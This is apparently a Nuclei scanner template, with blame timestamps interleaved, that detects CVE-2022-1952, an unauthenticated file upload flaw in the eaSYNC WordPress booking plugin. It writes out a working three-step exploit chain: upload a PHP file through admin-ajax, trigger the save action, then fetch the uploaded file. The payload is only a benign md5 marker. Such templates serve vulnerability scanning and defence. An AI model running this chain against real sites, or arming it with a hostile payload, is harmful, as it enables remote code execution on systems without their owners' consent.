2022-10-29 11:20:01 +00:00
id : CVE-2022-1952
info :
name : eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload
author : theamanrawat
severity : critical
description : |
The Free Booking Plugin for Hotels, Restaurant and Car Rental WordPress plugin before 1.1.16 suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps.
reference :
- https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
- https://wordpress.org/plugins/easync-booking/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1952
classification :
2022-11-11 20:30:02 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-10-29 11:20:01 +00:00
cve-id : CVE-2022-1952
2022-11-11 20:30:02 +00:00
cwe-id : CWE-434
2022-10-29 11:20:01 +00:00
metadata :
2022-11-12 07:18:56 +00:00
verified : true
tags : cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive
2022-10-29 11:20:01 +00:00
requests :
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Cookie : PHPSESSID=a0d5959357e474aef655313f69891f37
Content-Type : multipart/form-data; boundary=------------------------98efee55508c5059
--------------------------98efee55508c5059
Content-Disposition : form-data; name="action"
easync_session_store
--------------------------98efee55508c5059
Content-Disposition : form-data; name="type"
car
--------------------------98efee55508c5059
Content-Disposition : form-data; name="with_driver"
self-driven
--------------------------98efee55508c5059
2022-11-11 20:13:12 +00:00
Content-Disposition : form-data; name="driver_license_image2"; filename="{{randstr}}.php"
2022-10-29 11:20:01 +00:00
Content-Type : application/octet-stream
2022-11-04 07:07:38 +00:00
<?php echo md5('CVE-2022-1952');?>
2022-10-29 11:20:01 +00:00
--------------------------98efee55508c5059--
- |
GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
Host : {{Hostname}}
Cookie : PHPSESSID=a0d5959357e474aef655313f69891f37
- |
GET /wp-content/uploads/{{filename}}.php HTTP/1.1
Host : {{Hostname}}
req-condition : true
matchers :
- type : dsl
dsl :
- contains(all_headers_3, "text/html")
- status_code_3 == 200
2022-11-04 07:07:38 +00:00
- contains(body_1, 'success\":true')
- contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
2022-10-29 11:20:01 +00:00
condition : and
extractors :
- type : regex
name : filename
group : 1
regex :
2022-11-04 07:07:38 +00:00
- 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
internal : true